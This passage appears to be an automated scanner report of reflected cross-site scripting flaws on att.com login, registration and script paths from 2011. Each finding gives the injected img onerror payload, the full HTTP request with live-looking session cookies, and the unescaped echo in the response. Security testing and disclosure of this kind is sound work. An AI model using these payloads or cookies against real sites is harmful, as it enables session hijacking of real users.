fsr.s=%7B%22cp%22%3A%7B%22customer_type%22%3A%22current%22%2C%22app_visitor_cookie%22%3A%22A001533839947%22%2C%22poc_login%22%3A%22no%22%2C%22mc%22%3A%22ICcs4CSUB0000000L%22%2C%22sd%22%3A%22c-wireless-sales%22%2C%22config_version%22%3A%22009A%22%2C%22code_version%22%3A%226.3.0%22%2C%22role%22%3A%22null%22%2C%22time%22%3A%22Wed%20Apr%2027%2018%3A23%3A20%20CDT%202011%22%2C%22ctn%22%3A%22%22%2C%22user_type%22%3A%22TELCO%22%7D%2C%22rid%22%3A%221303946450313_179502%22%2C%22v%22%3A2%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fwww.wireless.att.com%2Fcell-phone-service%2Fwelcome%2Findex.jsp%22%2C%22pv%22%3A1%2C%22lc%22%3A%7B%22d8%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%2C%22e%22%3A1%7D%7D%2C%22cd%22%3A8%2C%22sd%22%3A8%7D; fsr.a=1303946628870

Response

HTTP/1.1 404 Not Found
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html; charset=UTF-8
Content-Length: 9089
Vary: Accept-Encoding
Date: Wed, 27 Apr 2011 23:25:35 GMT
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<title
...[SNIP]...
<meta name="DCSext.failedurl" content="https://www.att.com:443/olam/js6e2da"><img src=a onerror=alert(1)>104eda6ef9b/validate.js">
...[SNIP]...

3.731. https://www.att.com/olam/js/validate.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.att.com
Path:	/olam/js/validate.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b30a1"><img%20src%3da%20onerror%3dalert(1)>64669caebf6 was submitted in the REST URL parameter 3. This input was echoed as b30a1"><img src=a onerror=alert(1)>64669caebf6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /olam/js/validate.jsb30a1"><img%20src%3da%20onerror%3dalert(1)>64669caebf6 HTTP/1.1
Host: www.att.com
Connection: keep-alive
Referer: https://www.att.com/olam/registrationAction.olamexecute
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=CFC3987A712410711B27EDDFEFA2AC4B; TLTUID=CFC3987A712410711B27EDDFEFA2AC4B; B2CSESSIONID=QpmbN4kFk2JVFn!966987163; DYN_USER_ID=3831805542; DYN_USER_CONFIRM=1235118b78dcad6811997a70c965cc03; cust_type=new; svariants=NA; BIGipServerpATTWL_7010_7011=3756118407.25115.0000; ECOM_GTM=owaln_osaln; DL3K=32nnnTa266WTriDckoD4M0ANMDOHT6md0slP1JdMoR5q-14ohahhI_A; bn_u=6923522882713032529; wtAka=y; op704wirelesssearchlandingpage1gum=a005005004274ri19c6a28261; op704wirelesssearchlandingpage1liid=a005005004274ri19c6a28261; BCNSESS=run=false; JSID_coredisp=0000ZcQz-B6qJ54k94jufOkeS6v:14cs3nf6m; DTAB=Tab=Bus; busHomeBox1=0; busHomeBox2=0; busHomeBox3=0; busHomeBox4=0; colam_ctn=l%3Den_US; TLTHID=53E74CF07125107191619E552188C3F4; EDOCSSESSIONID=LcHnN4lDXdLZ1N0cZc1BhKTv3CvHv8ywTx1r524x2P2CgpccQ7Ly!-744530585; browserid=A001533839947; stack=doammw08; fsr.s=%7B%22cp%22%3A%7B%22customer_type%22%3A%22current%22%2C%22app_visitor_cookie%22%3A%22A001533839947%22%2C%22poc_login%22%3A%22no%22%2C%22mc%22%3A%22ICcs4CSUB0000000L%22%2C%22sd%22%3A%22c-wireless-sales%22%2C%22config_version%22%3A%22009A%22%2C%22code_version%22%3A%226.3.0%22%2C%22role%22%3A%22null%22%2C%22time%22%3A%22Wed%20Apr%2027%2018%3A23%3A20%20CDT%202011%22%2C%22ctn%22%3A%22%22%2C%22user_type%22%3A%22TELCO%22%7D%2C%22rid%22%3A%221303946450313_179502%22%2C%22v%22%3A2%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fwww.wireless.att.com%2Fcell-phone-service%2Fwelcome%2Findex.jsp%22%2C%22pv%22%3A1%2C%22lc%22%3A%7B%22d8%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%2C%22e%22%3A1%7D%7D%2C%22cd%22%3A8%2C%22sd%22%3A8%7D; fsr.a=1303946628870

Response

HTTP/1.1 404 Not Found
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html; charset=UTF-8
Content-Length: 9089
Vary: Accept-Encoding
Date: Wed, 27 Apr 2011 23:25:40 GMT
Connection: keep-alive
Set-Cookie: TLTHID=AA0FC86E7125107197889E552188C3F4; path=/; domain=.att.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<title
...[SNIP]...
<meta name="DCSext.failedurl" content="https://www.att.com:443/olam/js/validate.jsb30a1"><img src=a onerror=alert(1)>64669caebf6">
...[SNIP]...

3.732. https://www.att.com/olam/jsp/tiles/common_includes/cGateCookie.jsp [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.att.com
Path:	/olam/jsp/tiles/common_includes/cGateCookie.jsp

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a74e"><img%20src%3da%20onerror%3dalert(1)>ecfdccfc84d was submitted in the REST URL parameter 2. This input was echoed as 7a74e"><img src=a onerror=alert(1)>ecfdccfc84d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /olam/jsp7a74e"><img%20src%3da%20onerror%3dalert(1)>ecfdccfc84d/tiles/common_includes/cGateCookie.jsp?userType=&isLogout= HTTP/1.1
Host: www.att.com
Connection: keep-alive
Referer: https://www.att.com/olam/loginAction.olamexecute?customerType=L
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=CFC3987A712410711B27EDDFEFA2AC4B; TLTUID=CFC3987A712410711B27EDDFEFA2AC4B; B2CSESSIONID=QpmbN4kFk2JVFn!966987163; DYN_USER_ID=3831805542; DYN_USER_CONFIRM=1235118b78dcad6811997a70c965cc03; cust_type=new; svariants=NA; BIGipServerpATTWL_7010_7011=3756118407.25115.0000; ECOM_GTM=owaln_osaln; DL3K=32nnnTa266WTriDckoD4M0ANMDOHT6md0slP1JdMoR5q-14ohahhI_A; bn_u=6923522882713032529; wtAka=y; op704wirelesssearchlandingpage1gum=a005005004274ri19c6a28261; op704wirelesssearchlandingpage1liid=a005005004274ri19c6a28261; BCNSESS=run=false; JSID_coredisp=0000ZcQz-B6qJ54k94jufOkeS6v:14cs3nf6m; DTAB=Tab=Bus; busHomeBox1=0; busHomeBox2=0; busHomeBox3=0; busHomeBox4=0; colam_ctn=l%3Den_US; TLTHID=53E74CF07125107191619E552188C3F4; EDOCSSESSIONID=LcHnN4lDXdLZ1N0cZc1BhKTv3CvHv8ywTx1r524x2P2CgpccQ7Ly!-744530585; browserid=A001533839947; stack=doammw08; fsr.s=%7B%22cp%22%3A%7B%22customer_type%22%3A%22current%22%2C%22app_visitor_cookie%22%3A%22A001533839947%22%2C%22poc_login%22%3A%22no%22%2C%22mc%22%3A%22ICcs4CSUB0000000L%22%2C%22sd%22%3A%22c-wireless-sales%22%2C%22config_version%22%3A%22009A%22%2C%22code_version%22%3A%226.3.0%22%2C%22role%22%3A%22null%22%2C%22time%22%3A%22Wed%20Apr%2027%2018%3A23%3A20%20CDT%202011%22%2C%22ctn%22%3A%22%22%2C%22user_type%22%3A%22TELCO%22%7D%2C%22rid%22%3A%221303946450313_179502%22%2C%22v%22%3A2%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fwww.wireless.att.com%2Fcell-phone-service%2Fwelcome%2Findex.jsp%22%2C%22pv%22%3A1%2C%22lc%22%3A%7B%22d8%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%2C%22e%22%3A1%7D%7D%2C%22cd%22%3A8%2C%22sd%22%3A8%7D; fsr.a=1303946630070

Response

HTTP/1.1 404 Not Found
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html; charset=UTF-8
Content-Length: 9116
Vary: Accept-Encoding
Date: Wed, 27 Apr 2011 23:24:22 GMT
Connection: keep-alive
Set-Cookie: TLTHID=7B847E367125107193929E552188C3F4; path=/; domain=.att.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<title
...[SNIP]...
<meta name="DCSext.failedurl" content="https://www.att.com:443/olam/jsp7a74e"><img src=a onerror=alert(1)>ecfdccfc84d/tiles/common_includes/cGateCookie.jsp">
...[SNIP]...

3.733. https://www.att.com/olam/jsp/tiles/common_includes/cGateCookie.jsp [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.att.com
Path:	/olam/jsp/tiles/common_includes/cGateCookie.jsp

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aec42"><img%20src%3da%20onerror%3dalert(1)>cacb75c2462 was submitted in the REST URL parameter 3. This input was echoed as aec42"><img src=a onerror=alert(1)>cacb75c2462 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /olam/jsp/tilesaec42"><img%20src%3da%20onerror%3dalert(1)>cacb75c2462/common_includes/cGateCookie.jsp?userType=&isLogout= HTTP/1.1
Host: www.att.com
Connection: keep-alive
Referer: https://www.att.com/olam/loginAction.olamexecute?customerType=L
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=CFC3987A712410711B27EDDFEFA2AC4B; TLTUID=CFC3987A712410711B27EDDFEFA2AC4B; B2CSESSIONID=QpmbN4kFk2JVFn!966987163; DYN_USER_ID=3831805542; DYN_USER_CONFIRM=1235118b78dcad6811997a70c965cc03; cust_type=new; svariants=NA; BIGipServerpATTWL_7010_7011=3756118407.25115.0000; ECOM_GTM=owaln_osaln; DL3K=32nnnTa266WTriDckoD4M0ANMDOHT6md0slP1JdMoR5q-14ohahhI_A; bn_u=6923522882713032529; wtAka=y; op704wirelesssearchlandingpage1gum=a005005004274ri19c6a28261; op704wirelesssearchlandingpage1liid=a005005004274ri19c6a28261; BCNSESS=run=false; JSID_coredisp=0000ZcQz-B6qJ54k94jufOkeS6v:14cs3nf6m; DTAB=Tab=Bus; busHomeBox1=0; busHomeBox2=0; busHomeBox3=0; busHomeBox4=0; colam_ctn=l%3Den_US; TLTHID=53E74CF07125107191619E552188C3F4; EDOCSSESSIONID=LcHnN4lDXdLZ1N0cZc1BhKTv3CvHv8ywTx1r524x2P2CgpccQ7Ly!-744530585; browserid=A001533839947; stack=doammw08; fsr.s=%7B%22cp%22%3A%7B%22customer_type%22%3A%22current%22%2C%22app_visitor_cookie%22%3A%22A001533839947%22%2C%22poc_login%22%3A%22no%22%2C%22mc%22%3A%22ICcs4CSUB0000000L%22%2C%22sd%22%3A%22c-wireless-sales%22%2C%22config_version%22%3A%22009A%22%2C%22code_version%22%3A%226.3.0%22%2C%22role%22%3A%22null%22%2C%22time%22%3A%22Wed%20Apr%2027%2018%3A23%3A20%20CDT%202011%22%2C%22ctn%22%3A%22%22%2C%22user_type%22%3A%22TELCO%22%7D%2C%22rid%22%3A%221303946450313_179502%22%2C%22v%22%3A2%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fwww.wireless.att.com%2Fcell-phone-service%2Fwelcome%2Findex.jsp%22%2C%22pv%22%3A1%2C%22lc%22%3A%7B%22d8%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%2C%22e%22%3A1%7D%7D%2C%22cd%22%3A8%2C%22sd%22%3A8%7D; fsr.a=1303946630070

Response

HTTP/1.1 404 Not Found
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html; charset=UTF-8
Content-Length: 9116
Vary: Accept-Encoding
Date: Wed, 27 Apr 2011 23:24:25 GMT
Connection: keep-alive
Set-Cookie: TLTHID=7D6B76C87125107193DC9E552188C3F4; path=/; domain=.att.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<title
...[SNIP]...
<meta name="DCSext.failedurl" content="https://www.att.com:443/olam/jsp/tilesaec42"><img src=a onerror=alert(1)>cacb75c2462/common_includes/cGateCookie.jsp">
...[SNIP]...

3.734. https://www.att.com/olam/jsp/tiles/common_includes/cGateCookie.jsp [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.att.com
Path:	/olam/jsp/tiles/common_includes/cGateCookie.jsp

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec1df"><img%20src%3da%20onerror%3dalert(1)>5e8c45dc087 was submitted in the REST URL parameter 4. This input was echoed as ec1df"><img src=a onerror=alert(1)>5e8c45dc087 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /olam/jsp/tiles/common_includesec1df"><img%20src%3da%20onerror%3dalert(1)>5e8c45dc087/cGateCookie.jsp?userType=&isLogout= HTTP/1.1
Host: www.att.com
Connection: keep-alive
Referer: https://www.att.com/olam/registrationAction.olamexecute
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=CFC3987A712410711B27EDDFEFA2AC4B; TLTUID=CFC3987A712410711B27EDDFEFA2AC4B; B2CSESSIONID=QpmbN4kFk2JVFn!966987163; DYN_USER_ID=3831805542; DYN_USER_CONFIRM=1235118b78dcad6811997a70c965cc03; cust_type=new; svariants=NA; BIGipServerpATTWL_7010_7011=3756118407.25115.0000; ECOM_GTM=owaln_osaln; DL3K=32nnnTa266WTriDckoD4M0ANMDOHT6md0slP1JdMoR5q-14ohahhI_A; bn_u=6923522882713032529; wtAka=y; op704wirelesssearchlandingpage1gum=a005005004274ri19c6a28261; op704wirelesssearchlandingpage1liid=a005005004274ri19c6a28261; BCNSESS=run=false; JSID_coredisp=0000ZcQz-B6qJ54k94jufOkeS6v:14cs3nf6m; DTAB=Tab=Bus; busHomeBox1=0; busHomeBox2=0; busHomeBox3=0; busHomeBox4=0; colam_ctn=l%3Den_US; EDOCSSESSIONID=LcHnN4lDXdLZ1N0cZc1BhKTv3CvHv8ywTx1r524x2P2CgpccQ7Ly!-744530585; browserid=A001533839947; stack=doammw08; TLTHID=638F77867125107191D59E552188C3F4; fsr.s=%7B%22cp%22%3A%7B%22customer_type%22%3A%22current%22%2C%22app_visitor_cookie%22%3A%22A001533839947%22%2C%22poc_login%22%3A%22no%22%2C%22mc%22%3A%22ICcs4CSUB0000000L%22%2C%22sd%22%3A%22c-wireless-sales%22%2C%22config_version%22%3A%22009A%22%2C%22code_version%22%3A%226.3.0%22%2C%22role%22%3A%22null%22%2C%22time%22%3A%22Wed%20Apr%2027%2018%3A23%3A20%20CDT%202011%22%2C%22ctn%22%3A%22%22%2C%22user_type%22%3A%22N%22%7D%2C%22rid%22%3A%221303946450313_179502%22%2C%22v%22%3A2%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fwww.wireless.att.com%2Fcell-phone-service%2Fwelcome%2Findex.jsp%22%2C%22pv%22%3A1%2C%22lc%22%3A%7B%22d8%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%2C%22e%22%3A1%7D%7D%2C%22cd%22%3A8%2C%22sd%22%3A8%7D

Response

HTTP/1.1 404 Not Found
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html; charset=UTF-8
Content-Length: 9116
Vary: Accept-Encoding
Date: Wed, 27 Apr 2011 23:24:28 GMT
Connection: keep-alive
Set-Cookie: TLTHID=7F62D0167125107194519E552188C3F4; path=/; domain=.att.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<title
...[SNIP]...
<meta name="DCSext.failedurl" content="https://www.att.com:443/olam/jsp/tiles/common_includesec1df"><img src=a onerror=alert(1)>5e8c45dc087/cGateCookie.jsp">
...[SNIP]...

3.735. https://www.att.com/olam/jsp/tiles/common_includes/cGateCookie.jsp [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.att.com
Path:	/olam/jsp/tiles/common_includes/cGateCookie.jsp

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a6a02"><img%20src%3da%20onerror%3dalert(1)>25f7193c2f8 was submitted in the REST URL parameter 5. This input was echoed as a6a02"><img src=a onerror=alert(1)>25f7193c2f8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /olam/jsp/tiles/common_includes/cGateCookie.jspa6a02"><img%20src%3da%20onerror%3dalert(1)>25f7193c2f8?userType=&isLogout= HTTP/1.1
Host: www.att.com
Connection: keep-alive
Referer: https://www.att.com/olam/loginAction.olamexecute?customerType=L
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=CFC3987A712410711B27EDDFEFA2AC4B; TLTUID=CFC3987A712410711B27EDDFEFA2AC4B; B2CSESSIONID=QpmbN4kFk2JVFn!966987163; DYN_USER_ID=3831805542; DYN_USER_CONFIRM=1235118b78dcad6811997a70c965cc03; cust_type=new; svariants=NA; BIGipServerpATTWL_7010_7011=3756118407.25115.0000; ECOM_GTM=owaln_osaln; DL3K=32nnnTa266WTriDckoD4M0ANMDOHT6md0slP1JdMoR5q-14ohahhI_A; bn_u=6923522882713032529; wtAka=y; op704wirelesssearchlandingpage1gum=a005005004274ri19c6a28261; op704wirelesssearchlandingpage1liid=a005005004274ri19c6a28261; BCNSESS=run=false; JSID_coredisp=0000ZcQz-B6qJ54k94jufOkeS6v:14cs3nf6m; DTAB=Tab=Bus; busHomeBox1=0; busHomeBox2=0; busHomeBox3=0; busHomeBox4=0; colam_ctn=l%3Den_US; TLTHID=53E74CF07125107191619E552188C3F4; EDOCSSESSIONID=LcHnN4lDXdLZ1N0cZc1BhKTv3CvHv8ywTx1r524x2P2CgpccQ7Ly!-744530585; browserid=A001533839947; stack=doammw08; fsr.s=%7B%22cp%22%3A%7B%22customer_type%22%3A%22current%22%2C%22app_visitor_cookie%22%3A%22A001533839947%22%2C%22poc_login%22%3A%22no%22%2C%22mc%22%3A%22ICcs4CSUB0000000L%22%2C%22sd%22%3A%22c-wireless-sales%22%2C%22config_version%22%3A%22009A%22%2C%22code_version%22%3A%226.3.0%22%2C%22role%22%3A%22null%22%2C%22time%22%3A%22Wed%20Apr%2027%2018%3A23%3A20%20CDT%202011%22%2C%22ctn%22%3A%22%22%2C%22user_type%22%3A%22TELCO%22%7D%2C%22rid%22%3A%221303946450313_179502%22%2C%22v%22%3A2%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fwww.wireless.att.com%2Fcell-phone-service%2Fwelcome%2Findex.jsp%22%2C%22pv%22%3A1%2C%22lc%22%3A%7B%22d8%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%2C%22e%22%3A1%7D%7D%2C%22cd%22%3A8%2C%22sd%22%3A8%7D; fsr.a=1303946630070

Response

HTTP/1.1 404 Not Found
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html; charset=UTF-8
Content-Length: 9116
Vary: Accept-Encoding
Date: Wed, 27 Apr 2011 23:24:32 GMT
Connection: keep-alive
Set-Cookie: TLTHID=8151776A7125107194A89E552188C3F4; path=/; domain=.att.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<title
...[SNIP]...
<meta name="DCSext.failedurl" content="https://www.att.com:443/olam/jsp/tiles/common_includes/cGateCookie.jspa6a02"><img src=a onerror=alert(1)>25f7193c2f8">
...[SNIP]...

3.736. https://www.att.com/olam/loginAction.olamexecute [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.att.com
Path:	/olam/loginAction.olamexecute

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4776"><img%20src%3da%20onerror%3dalert(1)>308930536fd was submitted in the REST URL parameter 2. This input was echoed as d4776"><img src=a onerror=alert(1)>308930536fd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /olam/loginAction.olamexecuted4776"><img%20src%3da%20onerror%3dalert(1)>308930536fd?customerType=L HTTP/1.1
Host: www.att.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=CFC3987A712410711B27EDDFEFA2AC4B; TLTUID=CFC3987A712410711B27EDDFEFA2AC4B; B2CSESSIONID=QpmbN4kFk2JVFn!966987163; DYN_USER_ID=3831805542; DYN_USER_CONFIRM=1235118b78dcad6811997a70c965cc03; cust_type=new; browserid=A001533839947; svariants=NA; BIGipServerpATTWL_7010_7011=3756118407.25115.0000; ECOM_GTM=owaln_osaln; DL3K=32nnnTa266WTriDckoD4M0ANMDOHT6md0slP1JdMoR5q-14ohahhI_A; bn_u=6923522882713032529; wtAka=y; op704wirelesssearchlandingpage1gum=a005005004274ri19c6a28261; op704wirelesssearchlandingpage1liid=a005005004274ri19c6a28261; BCNSESS=run=false; JSID_coredisp=0000ZcQz-B6qJ54k94jufOkeS6v:14cs3nf6m; TLTHID=EF42DE367124107128A6B78052916767; fsr.s=%7B%22cp%22%3A%7B%22customer_type%22%3A%22new%22%2C%22app_visitor_cookie%22%3A%22A001533839947%22%2C%22poc_login%22%3A%22no%22%2C%22mc%22%3A%22ICcs4CSUB0000000L%22%2C%22sd%22%3A%22c-wireless-sales%22%2C%22config_version%22%3A%22009A%22%2C%22code_version%22%3A%226.3.0%22%7D%2C%22rid%22%3A%221303946450313_179502%22%2C%22v%22%3A2%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fwww.wireless.att.com%2Fcell-phone-service%2Fwelcome%2Findex.jsp%22%2C%22pv%22%3A1%2C%22lc%22%3A%7B%22d8%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%2C%22e%22%3A1%7D%7D%2C%22cd%22%3A8%2C%22sd%22%3A8%7D; DTAB=Tab=Bus

Response

HTTP/1.1 404 Not Found
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache="set-cookie"
Content-Length: 9098
Vary: Accept-Encoding
Date: Wed, 27 Apr 2011 23:24:28 GMT
Connection: keep-alive
Set-Cookie: TLTHID=7F0480B07125107136EDBF35521FC8B5; path=/; domain=.att.com
Set-Cookie: EDOCSSESSIONID=m52bN4lM1mnk00dTHnTxyFhZQF6gFnQw6XXgcY9r0KPLgmVTxLJs!-651781025; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<title
...[SNIP]...
<meta name="DCSext.failedurl" content="https://www.att.com:443/olam/loginAction.olamexecuted4776"><img src=a onerror=alert(1)>308930536fd">
...[SNIP]...

3.737. https://www.att.com/olam/registrationAction.olamexecute [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.att.com
Path:	/olam/registrationAction.olamexecute

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6579b"><img%20src%3da%20onerror%3dalert(1)>6a711fed7d8 was submitted in the REST URL parameter 2. This input was echoed as 6579b"><img src=a onerror=alert(1)>6a711fed7d8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /olam/registrationAction.olamexecute6579b"><img%20src%3da%20onerror%3dalert(1)>6a711fed7d8 HTTP/1.1
Host: www.att.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=CFC3987A712410711B27EDDFEFA2AC4B; TLTUID=CFC3987A712410711B27EDDFEFA2AC4B; B2CSESSIONID=QpmbN4kFk2JVFn!966987163; DYN_USER_ID=3831805542; DYN_USER_CONFIRM=1235118b78dcad6811997a70c965cc03; cust_type=new; browserid=A001533839947; svariants=NA; BIGipServerpATTWL_7010_7011=3756118407.25115.0000; ECOM_GTM=owaln_osaln; DL3K=32nnnTa266WTriDckoD4M0ANMDOHT6md0slP1JdMoR5q-14ohahhI_A; bn_u=6923522882713032529; wtAka=y; op704wirelesssearchlandingpage1gum=a005005004274ri19c6a28261; op704wirelesssearchlandingpage1liid=a005005004274ri19c6a28261; BCNSESS=run=false; JSID_coredisp=0000ZcQz-B6qJ54k94jufOkeS6v:14cs3nf6m; TLTHID=EF42DE367124107128A6B78052916767; fsr.s=%7B%22cp%22%3A%7B%22customer_type%22%3A%22new%22%2C%22app_visitor_cookie%22%3A%22A001533839947%22%2C%22poc_login%22%3A%22no%22%2C%22mc%22%3A%22ICcs4CSUB0000000L%22%2C%22sd%22%3A%22c-wireless-sales%22%2C%22config_version%22%3A%22009A%22%2C%22code_version%22%3A%226.3.0%22%7D%2C%22rid%22%3A%221303946450313_179502%22%2C%22v%22%3A2%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fwww.wireless.att.com%2Fcell-phone-service%2Fwelcome%2Findex.jsp%22%2C%22pv%22%3A1%2C%22lc%22%3A%7B%22d8%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%2C%22e%22%3A1%7D%7D%2C%22cd%22%3A8%2C%22sd%22%3A8%7D; DTAB=Tab=Bus

Response

HTTP/1.1 404 Not Found
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache="set-cookie"
Content-Length: 9105
Vary: Accept-Encoding
Date: Wed, 27 Apr 2011 23:24:30 GMT
Connection: keep-alive
